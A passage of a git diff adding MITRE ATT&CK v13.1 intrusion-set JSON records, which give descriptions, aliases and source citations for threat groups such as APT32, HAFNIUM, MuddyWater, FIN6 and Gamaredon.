McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e.json new file mode 100644 index 0000000000000000000000000000000000000000..5c79dd2d48946e8a82f5a9dd48b78099cbe3a442 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e.json @@ -0,0 +1,89 @@ +{ + "type": "bundle", + "id": "bundle--dbcf65ee-77ea-44e8-a5ca-c4d64385d9c0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T21:04:18.158Z", + "name": "APT32", + "description": "[APT32](https://attack.mitre.org/groups/G0050) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)", + "aliases": [ + "APT32", + "SeaLotus", + "OceanLotus", + "APT-C-00" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.6", + "x_mitre_contributors": [ + "Romain Dumont, ESET" + ], + "type": "intrusion-set", + "id": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0050", + "external_id": "G0050" + }, + { + "source_name": "SeaLotus", + "description": "(Citation: Cybereason Oceanlotus May 2017)" + }, + { + "source_name": "APT-C-00", + "description": "(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)" + }, + { + "source_name": "APT32", + "description": "(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)" + }, + { + "source_name": "OceanLotus", + "description": "(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: Amnesty Intl. Ocean Lotus February 2021)" + }, + { + "source_name": "Amnesty Intl. Ocean Lotus February 2021", + "description": "Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.", + "url": "https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + }, + { + "source_name": "Cybereason Oceanlotus May 2017", + "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.", + "url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + }, + { + "source_name": "ESET OceanLotus Mar 2019", + "description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.", + "url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/" + }, + { + "source_name": "ESET OceanLotus", + "description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", + "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + }, + { + "source_name": "Volexity OceanLotus Nov 2017", + "description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.", + "url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87.json new file mode 100644 index 0000000000000000000000000000000000000000..90a71e5f3119429d918f5a11682d6f92e37ee8b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--7bd7076d-08af-4507-98bd-de80bcace430", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-10T21:54:46.756Z", + "name": "HAFNIUM", + "description": "[HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)", + "aliases": [ + "HAFNIUM", + "Operation Exchange Marauder" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Matt Brenton, Zurich Insurance Group", + "Mayuresh Dani, Qualys", + "Harshal Tupsamudre, Qualys", + "Vinayak Wadhwa, SAFE Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--2688b13e-8e71-405a-9c40-0dee94bddf87", + "created": "2021-03-03T19:40:47.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0125", + "external_id": "G0125" + }, + { + "source_name": "Operation Exchange Marauder", + "description": "(Citation: Volexity Exchange Marauder March 2021)" + }, + { + "source_name": "Volexity Exchange Marauder March 2021", + "description": "Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.", + "url": "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/" + }, + { + "source_name": "Microsoft HAFNIUM March 2020", + "description": "MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2.json new file mode 100644 index 0000000000000000000000000000000000000000..b1deb727e0838e7bd872b98fa330a63806b13129 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2.json @@ -0,0 +1,125 @@ +{ + "type": "bundle", + "id": "bundle--744d8b7f-30a9-4ad9-a744-10689a9240dd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:59:16.032Z", + "name": "MuddyWater", + "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)", + "aliases": [ + "MuddyWater", + "Earth Vetala", + "MERCURY", + "Static Kitten", + "Seedworm", + "TEMP.Zagros" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "4.1", + "x_mitre_contributors": [ + "Ozer Sarilar, @ozersarilar, STM", + "Daniyal Naeem, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0069", + "external_id": "G0069" + }, + { + "source_name": "MERCURY", + "description": "(Citation: Anomali Static Kitten February 2021)" + }, + { + "source_name": "Static Kitten", + "description": "(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)" + }, + { + "source_name": "TEMP.Zagros", + "description": "(Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)" + }, + { + "source_name": "Seedworm", + "description": "(Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)" + }, + { + "source_name": "Earth Vetala", + "description": "(Citation: Trend Micro Muddy Water March 2021)" + }, + { + "source_name": "MuddyWater", + "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)" + }, + { + "source_name": "ClearSky MuddyWater Nov 2018", + "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.", + "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf" + }, + { + "source_name": "ClearSky MuddyWater June 2019", + "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020.", + "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf" + }, + { + "source_name": "CYBERCOM Iranian Intel Cyber January 2022", + "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.", + "url": "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/" + }, + { + "source_name": "DHS CISA AA22-055A MuddyWater February 2022", + "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a" + }, + { + "source_name": "Unit 42 MuddyWater Nov 2017", + "description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/" + }, + { + "source_name": "Talos MuddyWater Jan 2022", + "description": "Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.", + "url": "https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html" + }, + { + "source_name": "Anomali Static Kitten February 2021", + "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.", + "url": "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + }, + { + "source_name": "Reaqta MuddyWater November 2017", + "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.", + "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/" + }, + { + "source_name": "FireEye MuddyWater Mar 2018", + "description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html" + }, + { + "source_name": "Symantec MuddyWater Dec 2018", + "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656.json new file mode 100644 index 0000000000000000000000000000000000000000..629fa3a49aa9ee379b97e2d952f087c0feeb82fa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--1350a4ee-203c-45a2-9d87-a7432f2337fb", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Strider", + "ProjectSauron" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656", + "type": "intrusion-set", + "created": "2017-05-31T21:32:07.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0041", + "external_id": "G0041" + }, + { + "source_name": "Strider", + "description": "(Citation: Symantec Strider Blog) (Citation: Kaspersky ProjectSauron Blog)" + }, + { + "source_name": "ProjectSauron", + "description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog) (Citation: Kaspersky ProjectSauron Full Report)" + }, + { + "source_name": "Symantec Strider Blog", + "description": "Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.", + "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets" + }, + { + "source_name": "Kaspersky ProjectSauron Blog", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.", + "url": "https://securelist.com/faq-the-projectsauron-apt/75533/" + }, + { + "source_name": "Kaspersky ProjectSauron Full Report", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.", + "url": "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf" + } + ], + "modified": "2020-06-29T01:43:19.374Z", + "name": "Strider", + "description": "[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--28f04ed3-8e91-4805-b1f6-869020517871.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--28f04ed3-8e91-4805-b1f6-869020517871.json new file mode 100644 index 0000000000000000000000000000000000000000..287f4d1358f33be2c7057c1319fdddc50707a888 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--28f04ed3-8e91-4805-b1f6-869020517871.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--0c271b3f-c1ed-462b-b68a-ca77aff04350", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T19:17:31.924Z", + "name": "Operation Wocao", + "description": "[Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019)", + "aliases": [ + "Operation Wocao" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Erik Schamper, @Schamperr, Fox-IT", + "Maarten van Dantzig, @MaartenVDantzig, Fox-IT" + ], + "type": "intrusion-set", + "id": "intrusion-set--28f04ed3-8e91-4805-b1f6-869020517871", + "created": "2020-11-17T20:33:44.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0116", + "external_id": "G0116" + }, + { + "source_name": "Operation Wocao", + "description": "(Citation: FoxIT Wocao December 2019)" + }, + { + "source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050.json new file mode 100644 index 0000000000000000000000000000000000000000..8b384715debfcee37ade84fafb8a23de2a6b44d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--9a80a27b-fc2e-4a81-9985-cf860fa9d9b3", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Naikon" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050", + "type": "intrusion-set", + "created": "2017-05-31T21:31:54.232Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0019", + "url": "https://attack.mitre.org/groups/G0019", + "source_name": "mitre-attack" + }, + { + "source_name": "Naikon", + "description": "(Citation: Baumgartner Naikon 2015)(Citation: CameraShy)(Citation: Baumgartner Golovkin Naikon 2015)" + }, + { + "source_name": "CameraShy", + "description": "ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.", + "url": "http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf" + }, + { + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "source_name": "Baumgartner Naikon 2015" + }, + { + "url": "https://securelist.com/the-naikon-apt/69953/", + "description": "Baumgartner, K., Golovkin, M.. (2015, May 14). The Naikon APT. Retrieved January 14, 2015.", + "source_name": "Baumgartner Golovkin Naikon 2015" + } + ], + "modified": "2021-08-19T18:23:23.507Z", + "name": "Naikon", + "description": "[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015) \n\nWhile [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json new file mode 100644 index 0000000000000000000000000000000000000000..043c81ce60566dd4015744ab7cef591df5b5c952 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json @@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--a92b7b4f-1599-4542-86fe-13b538147f4d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:50:17.471Z", + "name": "FIN6", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", + "aliases": [ + "FIN6", + "Magecart Group 6", + "ITG08", + "Skeleton Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.3", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Drew Church, Splunk" + ], + "type": "intrusion-set", + "id": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "created": "2017-05-31T21:32:06.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0037", + "external_id": "G0037" + }, + { + "source_name": "Skeleton Spider", + "description": "(Citation: Crowdstrike Global Threat Report Feb 2018)" + }, + { + "source_name": "FIN6", + "description": "(Citation: FireEye FIN6 April 2016)" + }, + { + "source_name": "Magecart Group 6", + "description": "(Citation: Security Intelligence ITG08 April 2020)" + }, + { + "source_name": "ITG08", + "description": "(Citation: Security Intelligence More Eggs Aug 2019)" + }, + { + "source_name": "Crowdstrike Global Threat Report Feb 2018", + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "url": "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + }, + { + "source_name": "FireEye FIN6 April 2016", + "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + }, + { + "source_name": "Security Intelligence ITG08 April 2020", + "description": "Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.", + "url": "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/" + }, + { + "source_name": "Security Intelligence More Eggs Aug 2019", + "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", + "url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf.json new file mode 100644 index 0000000000000000000000000000000000000000..bd2ed48ebb82aead1476d2d322a3a3ae8eab6168 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf.json @@ -0,0 +1,115 @@ +{ + "type": "bundle", + "id": "bundle--cc7a50d7-2256-44dc-8b5c-52a3e9f08de7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:29:39.915Z", + "name": "Gamaredon Group", + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word \"Armageddon\", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)\n\nIn November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia's Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022)", + "aliases": [ + "Gamaredon Group", + "IRON TILDEN", + "Primitive Bear", + "ACTINIUM", + "Armageddon", + "Shuckworm", + "DEV-0157" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "ESET", + "Trend Micro Incorporated" + ], + "type": "intrusion-set", + "id": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf", + "created": "2017-05-31T21:32:09.849Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 